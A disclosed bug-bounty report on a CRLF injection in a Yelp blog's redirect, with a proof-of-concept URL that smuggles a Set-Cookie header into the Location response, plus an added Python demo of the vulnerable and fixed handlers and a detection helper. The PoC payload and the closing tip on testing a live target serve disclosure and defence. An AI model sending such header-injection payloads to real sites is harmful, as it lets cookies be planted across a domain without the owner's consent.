[engineeringblog.yelp.com] CRLF Injection

Disclosed: 2017-11-09 20:12:42 By bobrov To yelp
Vulnerability Details
CRLF Injection via Request-URI

PoC:

```
https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com
```

HTTP Response:

```
HTTP/1.1 301 Moved Permanently
...
Location: http://engineeringblog.yelp.com/xxcrlftest
Set-Cookie: test=test;domain=.yelp.com
```

Result: Creating a cookie-param "test=test" on *.yelp.com
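The mechanism behind the report, as an added example (not the reporter's code and not Yelp's): a request path carrying `%0d%0a` is decoded and copied into the `Location` header of a 301, so the bytes after the CRLF are parsed by the client as a second header. The two server handlers below are constructed stand-ins, one reproducing the vulnerable behaviour and one hardened by re-encoding the decoded path; only the host name is taken from the report. A small header parser shows what a browser would see in each case.

```python
# Added example: simulates the CRLF injection from the report above and a
# hardened redirect handler. The handlers are constructed stand-ins, not the
# real server; only the host name comes from the report.
from urllib.parse import quote, unquote

HOST = "engineeringblog.yelp.com"  # host from the report; everything else is constructed


def build_poc_path(path: str, injected_header: str) -> str:
    """Build a Request-URI with a percent-encoded CRLF followed by an
    attacker-chosen header line, matching the shape of the report's PoC.
    ':' '=' ';' are left unencoded so the result mirrors the original URL."""
    return f"{path}%0d%0a{quote(injected_header, safe=':=;.')}"


def vulnerable_redirect(raw_path: str) -> bytes:
    """Stand-in for the vulnerable behaviour: the decoded path is copied into
    Location without stripping CR/LF, so the injected line becomes a header."""
    decoded = unquote(raw_path)
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: http://{HOST}{decoded}\r\n"
        "\r\n"
    ).encode("latin-1")


def hardened_redirect(raw_path: str) -> bytes:
    """Fixed stand-in: decode, then re-encode every byte that is not a safe
    path character before it reaches a header. CR and LF come out as %0D%0A
    and can no longer terminate the Location line. Rejecting the request
    with a 400 when the decoded path contains control characters is an
    equally valid choice; re-encoding is shown because it keeps the redirect."""
    decoded = unquote(raw_path)
    safe_path = quote(decoded, safe="/")
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: http://{HOST}{safe_path}\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_headers(response: bytes) -> tuple[str, dict[str, list[str]]]:
    """Parse a raw HTTP/1.1 response head the way a client does: every
    CRLF-terminated line before the blank line is a header. Names are
    lower-cased; repeated headers accumulate in a list."""
    head, _, _body = response.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = lines[0]
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def injected_headers(response: bytes, expected: set[str]) -> list[str]:
    """Detection helper: header names in the response that the handler never
    intended to send. For a redirect that only emits Location, anything else
    was smuggled in from the request."""
    _, headers = parse_headers(response)
    return sorted(name for name in headers if name not in expected)


if __name__ == "__main__":
    poc = build_poc_path("/xxcrlftest", "Set-Cookie: test=test;domain=.yelp.com")
    print("GET", poc)
    for handler in (vulnerable_redirect, hardened_redirect):
        resp = handler(poc)
        status, headers = parse_headers(resp)
        print(f"{handler.__name__}: {status}")
        print("  Location:", headers["location"][0])
        print("  injected:", injected_headers(resp, {"location"}))
```

Against a live target, the same check is to request the PoC path and run `injected_headers` over the raw response bytes; a `set-cookie` (or any header you did not send the request expecting) in that list is the finding, and the `domain=.yelp.com` attribute in the report is what turns a header injection on one subdomain into a cookie that every `*.yelp.com` host receives.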
Report Stats
  • Report ID: 66391
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 14